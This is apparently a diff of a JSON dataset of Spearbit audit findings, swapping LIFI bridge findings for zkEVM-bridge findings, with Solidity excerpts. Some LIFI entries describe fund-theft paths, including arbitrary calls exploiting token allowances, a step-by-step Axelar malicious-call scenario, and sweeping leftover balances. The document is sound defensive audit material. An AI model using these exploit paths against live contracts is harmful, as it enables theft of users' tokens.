}, { - "title": "Decrease allowance when it is already set a non-zero value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Non-standard tokens like USDT will revert the transaction when a contract or a user tries to approve an allowance when the spender allowance is already set to a non zero value. For that reason, the previous allowance should be decreased before increasing allowance in the related function. Performing a direct overwrite of the value in the allowances mapping is susceptible to front-running scenarios by an attacker (e.g., an approved spender). As an Openzeppelin mentioned, safeApprove should only be called when setting an initial allowance or when resetting it to zero. 9 function safeApprove( IERC20 token, address spender, uint256 value ) internal { // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), \"SafeERC20: approve from non-zero to non-zero allowance\" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value)); } There are four instance of this issue: AxelarFacet.sol is directly using approve function which does not check return value of an external function. The faucet should utilize LibAsset.maxApproveERC20() function like the other faucets. LibAsset s LibAsset.maxApproveERC20() function is used on the other faucets. For instance, USDTs ap- proval mechanism reverts if current allowance is nonzero. From that reason, the function can approve with zero first or safeIncreaseAllowance can be utilized. FusePoolZap.sol is also using approve function which does not check return value . The contract does not import any other libraries, that being the case, the contract should use safeApprove function with approving zero. Executor.sol is directly using approve function which does not check return value of an external function. The contract should utilize LibAsset.maxApproveERC20() function like the other contracts.", + "title": "Inheritance structure does not openly support contract upgrades", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The solidity compiler uses C3 linearisation to determine the order of contract inheritance. This is performed as left to right of all child contracts before considering the parent contract. Storage slot assignment PolygonZkEVMBridge is as follows: Initializable -> DepositContract -> EmergencyManager -> The Initializable.sol already reserves storage slots for future upgrades and because PolygonZkEVM- Bridge.sol is inherited last, storage slots can be safely appended. However, the two intermediate contracts, DepositContract.sol and EmergencyManager.sol, cannot handle storage upgrades.", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Too generic calls in GenericBridgeFacet allow stealing of tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "With the contract GenericBridgeFacet, the functions swapAndStartBridgeTokensGeneric() (via LibSwap.swap()) and _startBridge() allow arbitrary functions calls, which allow anyone to call transferFrom() and steal tokens from anyone who has given a large allowance to the LiFi protocol. This has been used to hack LiFi in the past. The followings risks also are present: call the Lifi Diamand itself via functions that dont have nonReentrant. perhaps cancel transfers of other users. call functions that are protected by a check on this, like completeBridgeTokensViaStargate. 10 contract GenericBridgeFacet is ILiFi, ReentrancyGuard { function swapAndStartBridgeTokensGeneric( ... LibSwap.swap(_lifiData.transactionId, _swapData[i]); ... } function _startBridge(BridgeData memory _bridgeData) internal { ... (bool success, bytes memory res) = _bridgeData.callTo.call{ value: value ,! }(_bridgeData.callData); ... } } library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); ... } }", + "title": "Function calculateRewardPerBatch() could divide by 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function calculateRewardPerBatch() does a division by totalBatchesToVerify. If there are currently no batches to verify, then totalBatchesToVerify would be 0 and the transaction would revert. When calculateRewardPerBatch() is called from _verifyBatches() this doesnt happen as it will revert earlier. However when the function is called externally this situation could occur. function calculateRewardPerBatch() public view returns (uint256) { ... uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch(); return currentBalance / totalBatchesToVerify; , }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "LiFi protocol isnt hardened", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs and doesnt verify them. Several elements are not connected via smart contracts but via the API, for example: the emits of LiFiTransferStarted versus the bridge transactions. the fees paid to the FeeCollector versus the bridge transactions. the Periphery contracts as defined in the PeripheryRegistryFacet versus the rest. In case the API and or frontend contain errors or are hacked then tokens could be easily lost. Also, when calling the LiFi contracts directly or via other smart contracts, it is rather trivial to commit mistakes and loose tokens. Emit data can be easily disturbed by malicious actors, making it unusable. The payment of fees can be easily circumvented by accessing the contracts directly. It is easy to make fake websites which trick users into signing transactions which seem to be for LiFi but result in loosing tokens. With the current design, the power of smart contracts isnt used and it introduces numerous risks as described in the rest of this report.", + "title": "Limit gas usage of _updateBatchFee()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function _updateBatchFee() loops through all unveried batches. Normally this would be 30 min/5 min ~ 6 batches. Assume the aggregator malfunctions and after one week, verifyBatches() is called, which calls _updateBatch- Fee(). Then there could be 7 * 24 * 60 min/ 5 min ~ 2352 batches. The function verifyBatches() limits this to MAX_VERIFY_BATCHES == 1000. This might result in an out-of-gas error. This would possibly require multiple verifyBatches() tries with a smaller number of batches, which would increase network outage. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... while (currentBatch != currentLastVerifiedBatch) { ... if (block.timestamp - currentSequencedBatchData.sequencedTimestamp >veryBatchTimeTarget) { ... } ... } ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Bridge with Axelar can be stolen with malicious external call", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Executor contract allows users to build an arbitrary payload external call to any address except address(erc20Proxy). erc20Proxy is not the only dangerous address to call. By building a malicious external call to Axelar gateway, exploiters can steal users funds. The Executor does swaps at the destination chain. By setting the receiver address to the Executor contract at the destination chain, Li-Fi can help users to get the best price. Executor inherits IAxelarExecutable. execute and executeWithToken validates the payload and executes the external call. IAxelarExecutable.sol#L27-L40 function executeWithToken( bytes32 commandId, string calldata sourceChain, string calldata sourceAddress, bytes calldata payload, string calldata tokenSymbol, uint256 amount ) external { bytes32 payloadHash = keccak256(payload); if (!gateway.validateContractCallAndMint(commandId, sourceChain, sourceAddress, payloadHash, ,! tokenSymbol, amount)) revert NotApprovedByGateway(); _executeWithToken(sourceChain, sourceAddress, payload, tokenSymbol, amount); } The nuance lies in the Axelar gateway AxelarGateway.sol#L133-L148. Once the receiver calls validateContract- CallAndMint with a valid payload, the gateway mints the tokens to the receiver and marks it as executed. It is the receiver contracts responsibility to execute the external call. Exploiters can build a malicious external call to trigger validateContractCallAndMint, the Axelar gateway would mint the tokens to the Executor contract. The exploiter can then pull the tokens from the Executor contract. The possible exploit scenario 1. Exploiter build a malicious external call. token.approve(address(exploiter), type(uint256).max) 2. A victim user uses the AxelarFacet to bridge tokens. Since the destination bridge has the best price, the users set the receiver to address(Executor) and finish the swap with this.swapAndCompleteBridgeTokens 3. Exploiter observes the victims bridge tx and way.validateContractCallAndMint. exploiter can pull the minted token from the executor contract since theres max allowance. The executor the minted token. builds an contract gets external call to trigger gate- The 4. The victim calls Executor.execute() with the valid payload. However, since the payload has been triggered by the exploiter, its no longer valid. 12", + "title": "Keep precision in _updateBatchFee()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Function _updateBatchFee() uses a trick to prevent losing precision in the calculation of accDivi- sor. The value accDivisor includes an extra multiplication with batchFee, which is undone when doing batchFee = (batchFee * batchFee) / accDivisor because this also contains an extra multiplication by batchFee. However, if batchFee happens to reach a small value (also see issue Minimum and maximum value for batch- Fee) then the trick doesnt work that well. In the extreme case of batchFee ==0 then a division by 0 will take place, resulting in a revert. Luckily this doesnt happen in practice. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (batchFee * batchFee) / accDivisor; ... , }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "LibSwap may pull tokens that are different from the specified asset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "LibSwap.swap is responsible for doing swaps. Its designed to swap one asset at a time. The _- swapData.callData is provided by user and the LiFi protocol only checks its signature. As a result, users can build a calldata to swap a different asset as specified. For example, the users can set fromAssetId = dai provided addLiquidity(usdc, dai, ...) as call data. The uniswap router would pull usdc and dai at the same time. If there were remaining tokens left in the LiFi protocol, users can sweep tokens from the protocol. library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... if (!LibAsset.isNativeAsset(fromAssetId)) { LibAsset.maxApproveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount); if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } else { nativeValue = fromAmount; } // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); if (!success) { string memory reason = LibUtil.getRevertMsg(res); revert(reason); } }", + "title": "Minimum and maximum value for batchFee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Function _updateBatchFee() updates the batchFee depending on the batch time target. If the batch times are repeatedly below or above the target, the batchFee could shrink or grow unlimited. If the batchFee would get too low, problems with the economic incentives might arise. If the batchFee would get too high, overows might occur. Also, the fee might too be high to be practically payable. Although not very likely to occur in practice, it is probably worth the trouble to implement limits. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... if (totalBatchesBelowTarget < totalBatchesAboveTarget) { ... batchFee = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * , 3)); } else { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); , batchFee = (batchFee * batchFee) / accDivisor; } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Check slippage of swaps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several bridges check that the output of swaps isnt 0. However it could also happen that swap give a positive output, but still lower than expected due to slippage / sandwiching / MEV. Several AMMs will have a mechanism to limit slippage, but it might be useful to add a generic mechanism as multiple swaps in sequence might have a relative large slippage. function swapAndStartBridgeTokensViaOmniBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); if (amount == 0) { revert InvalidAmount(); } _startBridge(_lifiData, _bridgeData, amount, true); }", + "title": "Bridge deployment will fail if initialize() is front-run", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "grades.deployProxy() with no type specied. This function accepts data which is used to initialize the state of the contract being deployed. However, because the zkEVM bridge script utilizes the output of each contract address on deployment, it is not trivial to atomically deploy and initialize contracts. As a result, there is a small time window available for attackers to front-run calls to initialize the necessary bridge contracts, allowing them to temporarily DoS during the deployment process.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Replace createRetryableTicketNoRefundAliasRewrite() with depositEth()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function _startBridge() of the ArbitrumBridgeFacet uses createRetryableTicketNoRefun- dAliasRewrite(). According to the docs: address-aliasing, this method skips some address rewrite magic that depositEth() does. Normally depositEth() should be used, according to the docs depositing-and-withdrawing-ether. Also this method will be deprecated after nitro: Inbox.sol#L283-L297. While the bridge doesnt do these checks of depositEth(), it is easy for developers, that call the LiFi contracts directly, to make mistakes and loose tokens. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }(...); } ... ... }", + "title": "Add input validation for the setVeryBatchTimeTarget method", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The setVeryBatchTimeTarget method in PolygonZkEVM accepts a uint64 newVeryBatchTimeTar- get argument to set the veryBatchTimeTarget. This variable has a value of 30 minutes in the initialize method, so it is expected that it shouldnt hold a very big value as it is compared to timestamps difference in _updateBatchFee. Since there is no upper bound for the value of the newVeryBatchTimeTarget argument, it is possible (for example due to fat-ngering the call) that an admin passes a big value (up to type(uint64).max) which will result in wrong calculation in _updateBatchFee.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Hardcode or whitelist the Axelar destinationAddress", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The functions executeCallViaAxelar() and executeCallWithTokenViaAxelar() call a destina- tionAddress on the destinationChain. This destinationAddress needs to have specific Axelar functions (_ex- ecute() and _executeWithTokento() ) be able to receive the calls. This is implemented in the Executor. If these functions dont exist at the destinationAddress, the transferred tokens will be lost. /// @param destinationAddress the address of the LiFi contract on the destinationChain function executeCallViaAxelar(..., string memory destinationAddress, ...) ... { ... s.gateway.callContract(destinationChain, destinationAddress, payload); } Note: the comment \"the address of the LiFi contract\" isnt clear, it could either be the LiFi Diamond or the Execu- tor.", + "title": "Single-step process for critical ownership transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "If the nominated newAdmin or newOwner account is not a valid account, the owner or admin risks locking themselves out. function setAdmin(address newAdmin) public onlyAdmin { admin = newAdmin; emit SetAdmin(newAdmin); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), \"Ownable: new owner is the zero address\"); _transferOwnership(newOwner); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "WormholeFacet doesnt send native token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The functions of WormholeFacet allow sending the native token, however they dont actually send it across the bridge, causing the native token to stay stuck in the LiFi Diamond and get lost for the sender. contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { function startBridgeTokensViaWormhole(... ) ... payable ... { // is payable LibAsset.depositAsset(_wormholeData.token, _wormholeData.amount); // allows native token _startBridge(_wormholeData); ... } function _startBridge(WormholeData memory _wormholeData) private { ... LibAsset.maxApproveERC20(...); // geared towards ERC20, also works when `msg.value` is set // no { value : .... } IWormholeRouter(_wormholeData.wormholeRouter).transferTokens(...); } }", + "title": "Ensure no native asset value is sent in payable method that can handle ERC20 transfers as well", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The bridgeAsset method of PolygonZkEVMBridge is marked payable as it can work both with the native asset as well as with ERC20 tokens. In the codepath where it is checked that the token is not the native asset but an ERC20 token, it is not validated that the user did not actually provide value to the transaction. The likelihood of this happening is pretty low since it requires a user error but if it does happen then the native asset value will be stuck in the PolygonZkEVMBridge contract.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "ArbitrumBridgeFacet does not check if msg.value is enough to cover the cost", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The ArbitrumBridgeFacet does not check whether the users provided ether (msg.value) is enough to cover _amount + cost. If there are remaining ethers in LiFis LibDiamond address, exploiters can set a large cost and sweep the ether. function _startBridge( ... ) private { ... uint256 cost = _bridgeData.maxSubmissionCost + _bridgeData.maxGas * _bridgeData.maxGasPrice; if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }( ... ); } else { gatewayRouter.outboundTransfer{ value: cost }( ... ); }", + "title": "Calls to the name, symbol and decimals functions will be unsafe for non-standard ERC20 tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The bridgeAsset method of PolygonZkEVMBridge accepts an address token argument and later calls the name, symbol and decimals methods of it. There are two potential problems with this: 1. Those methods are not mandatory in the ERC20 standard, so there can be ERC20-compliant tokens that do not have either or all of the name, symbol or decimals methods, so they will not be usable with the protocol, because the calls will revert 2. There are tokens that use bytes32 instead of string as the value type of their name and symbol storage vari- ables and their getter functions (example is MKR). This can cause reverts when trying to consume metadata from those tokens. Also, see weird-erc20 for nonstandard tokens.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Underpaying Optimism l2gas may lead to loss of funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The OptimismBridgeFacet uses Optimisms bridge with user-provided l2gas. function _startBridge( LiFiData calldata _lifiData, BridgeData calldata _bridgeData, uint256 _amount, bool _hasSourceSwap ) private { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.depositETHTo{ value: _amount }(_bridgeData.receiver, _bridgeData.l2Gas, \"\"); } else { ... bridge.depositERC20To( _bridgeData.assetId, _bridgeData.assetIdOnL2, _bridgeData.receiver, _amount, _bridgeData.l2Gas, \"\" ); } } Optimisms standard token bridge makes the cross-chain deposit by sending a cross-chain message to L2Bridge. L1StandardBridge.sol#L114-L123 17 // Construct calldata for finalizeDeposit call bytes memory message = abi.encodeWithSelector( IL2ERC20Bridge.finalizeDeposit.selector, address(0), Lib_PredeployAddresses.OVM_ETH, _from, _to, msg.value, _data ); // Send calldata into L2 // slither-disable-next-line reentrancy-events sendCrossDomainMessage(l2TokenBridge, _l2Gas, message); If the l2Gas is underpaid, finalizeDeposit will fail and user funds will be lost.", + "title": "Use calldata instead of memory for array parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The code frequently uses memory arrays for externally called functions. Some gas could be saved by making these calldata. The calldata can also be cascaded to internal functions that are called from the external functions. function claimAsset(bytes32[] memory smtProof) public { ... _verifyLeaf(smtProof); ... } function _verifyLeaf(bytes32[] memory smtProof) internal { ... verifyMerkleProof(smtProof); ... } function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal { ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Funds can be locked during the recovery stage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The recovery is an address that should receive funds if the execution fails on destination do- main. This ensures that funds are never lost with failed calls. However, in the AmarokFacet It is hardcoded as msg.sender. Several unexpected behaviour can be observed with this implementation. If the msg.sender is a smart contract, It might not be available on the destination chain. If the msg.sender is a smart contract and deployed on the other chain, the contract maybe will not have function to withdraw native token. As a result of this implementation, funds can be locked when an execution fails. 18 contract AmarokFacet is ILiFi, SwapperV2, ReentrancyGuard { ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ... }", + "title": "Optimize networkID == MAINNET_NETWORK_ID", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The value for networkID is dened in initialize() and MAINNET_NETWORK_ID is constant. So networkID == MAINNET_NETWORK_ID can be calculated in initialize() and stored to save some gas. It is even cheaper if networkID is immutable, which would require adding a constructor. uint32 public constant MAINNET_NETWORK_ID = 0; uint32 public networkID; function initialize(uint32 _networkID, ...) public virtual initializer { networkID = _networkID; ... } function _verifyLeaf(...) ... { ... if (networkID == MAINNET_NETWORK_ID) { ... } else { ... } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "What if the receiver of Axelar _executeWithToken() doesnt claim all tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function _executeWithToken() approves tokens and then calls callTo. If that contract doesnt retrieve the tokens then the tokens stay within the Executor and are lost. Also see: \"Remaining tokens can be sweeped from the LiFi Diamond or the Executor\" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... // transfer received tokens to the recipient IERC20(tokenAddress).approve(callTo, amount); (bool success, ) = callTo.call(callData); ... } }", + "title": "Optimize updateExitRoot()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function updateExitRoot() accesses the global variables lastMainnetExitRoot and las- tRollupExitRoot multiple times. This can be optimized using temporary variables. function updateExitRoot(bytes32 newRoot) external { ... if (msg.sender == rollupAddress) { lastRollupExitRoot = newRoot; } if (msg.sender == bridgeAddress) { lastMainnetExitRoot = newRoot; } bytes32 newGlobalExitRoot = keccak256( abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ); if ( ... ) { ... emit UpdateGlobalExitRoot(lastMainnetExitRoot, lastRollupExitRoot); } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Remaining tokens can be sweeped from the LiFi Diamond or the Executor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The initial balance of (native) tokens in both the Lifi Diamond and the Executor contract can be sweeped by all the swap functions in all the bridges, which use the following functions: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol _executeAndCheckSwaps() of SwapperV2.sol _executeAndCheckSwaps() of Swapper.sol swapAndCompleteBridgeTokens() of XChainExecFacet Although these functions ... swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol swapAndCompleteBridgeTokens() of XChainExecFacet have the following code: if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // sometimes transfer tokens in } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } // do swaps uint256 postSwapBalance = LibAsset.getOwnBalance(transferredAssetId); if (postSwapBalance > startingBalance) { LibAsset.transferAsset(transferredAssetId, receiver, postSwapBalance - startingBalance); } This doesnt protect the initial balance of the first tokens, because it can just be part of a swap to another token. The initial balances of intermediate tokens are not checked or protected. As there normally shouldnt be (native) tokens in the LiFi Diamond or the Executor the risk is limited. Note: set the risk to medium as there are other issues in this report that leave tokens in the contracts Although in practice there is some dust in the LiFi Diamond and the Executor: 0x362fa9d0bca5d19f743db50738345ce2b40ec99f 0x46405a9f361c1b9fc09f2c83714f806ff249dae7", + "title": "Optimize _setClaimed()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function claimAsset() and claimMessage() rst verify !isClaimed() (via the function _veri- fyLeaf()) and then do _setClaimed(). These two functions can be combined in a more efcient version. 17 function claimAsset(...) ... { _verifyLeaf(...); _setClaimed(index); ... } function claimMessage(...) ... { _verifyLeaf(...); _setClaimed(index); ... } function _verifyLeaf(...) ... { require( !isClaimed(index), ...); ... } function isClaimed(uint256 index) public view returns (bool) { uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; uint256 claimedWord = claimedBitMap[claimedWordIndex]; uint256 mask = (1 << claimedBitIndex); return (claimedWord & mask) == mask; } function _setClaimed(uint256 index) private { uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; claimedBitMap[claimedWordIndex] = claimedBitMap[claimedWordIndex] | (1 << claimedBitIndex); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Wormhole bridge chain IDs are different than EVM chain IDs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "According to documentation, Wormhole uses different chain ids than EVM based chain ids. However, the code is implemented with block.chainid check. LiFi is integrated with third party platforms through API. The API/UI side can implement chain id checks, but direct interaction with the contract can lead to loss of funds. function _startBridge(WormholeData memory _wormholeData) private { if (block.chainid == _wormholeData.toChainId) revert CannotBridgeToSameNetwork(); } From other perspective, the following line limits the recipient address to an EVM address. done to a non EVM chain (e.g. Solana, Terra, Terra classic), then the tokens would be lost. If a bridge would be ... bytes32(uint256(uint160(_wormholeData.recipient))) ... Example transactions below. Chainid 1 Solana Chainid 3 Terra Classic On the other hand, the usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. As previously mentioned, the wormhole destination chain ids are different than standard EVM based chains, the following event can be misinterpreted. ... emit LiFiTransferStarted( _lifiData.transactionId, \"wormhole\", \"\", _lifiData.integrator, _lifiData.referrer, _swapData[0].sendingAssetId, _lifiData.receivingAssetId, _wormholeData.recipient, _swapData[0].fromAmount, _wormholeData.toChainId, // It does not show correct chain id which is expected by LiFi Data Analytics true, false ,! ); ...", + "title": "SMT branch comparisons can be optimised", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "When verifying a merkle proof, the search does not terminate until we have iterated through the tree depth to calculate the merkle root. The path is represented by the lower 32 bits of the index variable where each bit represents the direction of the path taken. Two changes can be made to the following snippet of code: Bit shift currentIndex to the right instead of dividing by 2. Avoid overwriting the currentIndex variable and perform the bitwise comparison in-line. function verifyMerkleProof( ... uint256 currrentIndex = index; for ( uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++ ) { } if ((currrentIndex & 1) == 1) node = keccak256(abi.encodePacked(smtProof[height], node)); else node = keccak256(abi.encodePacked(node, smtProof[height])); currrentIndex /= 2;", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Facets approve arbitrary addresses for ERC20 tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "All the facets pointed above approve an address for an ERC20 token, where both these values are provided by the user: LibAsset.maxApproveERC20(IERC20(token), router, amount); The parameter names change depending on the context. So for any ERC20 token that LifiDiamond contract holds, user can: call any of the functions in these facets to approve another address for that token. use the approved address to transfer tokens out of LifiDiamond contract. Note: normally there shouldnt be any tokens in the LiFi Diamond contract so the risk is limited. Note: also see \"Hardcode bridge addresses via immutable\"", + "title": "Increments can be optimised by pre-xing variable with ++", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "There are small gas savings in performing when pre-xing increments with ++. Sometimes this can be used to combine multiple statements, like in function _deposit(). function _deposit(bytes32 leafHash) internal { ... depositCount += 1; uint256 size = depositCount; ... } Other occurrences of ++: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: lib/DepositContract.sol: lib/DepositContract.sol: { , lib/DepositContract.sol: { , lib/TokenWrapped.sol: verifiers/Verifier.sol: verifiers/Verifier.sol: verifiers/Verifier.sol: for (uint256 i = 0; i < batchesNum; i++) { currentLastForceBatchSequenced++; currentBatchSequenced++; lastPendingState++; lastForceBatch++; for (uint256 i = 0; i < batchesNum; i++) { currentLastForceBatchSequenced++; currentBatchSequenced++; height++ for (uint256 height = 0;height < _DEPOSIT_CONTRACT_TREE_DEPTH;height++) for (uint256 height = 0;height < _DEPOSIT_CONTRACT_TREE_DEPTH;height++) nonces[owner]++, for (uint i = 0; i < elements; i++) { for (uint i = 0; i < input.length; i++) { for (uint i = 0; i < input.length; i++) {", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk AcrossFacet.sol#L103, ArbitrumBridge-" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "FeeCollector not well integrated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There is a contract to pay fees for using the bridge: FeeCollector. This is used by crafting a transaction by the frontend API, which then calls the contract via _executeAndCheckSwaps(). Here is an example of the contract Here is an example of the contract of such a transaction Its whitelisted here This way no fees are paid if a developer is using the LiFi contracts directly. Also it is using a mechanism that isnt suited for this. The _executeAndCheckSwaps() is geared for swaps and has several checks on balances. These (and future) checks could interfere with the fee payments. Also this is a complicated and non transparent approach. The project has suggested to see _executeAndCheckSwaps() as a multicall mechanism.", + "title": "Move initialization values from 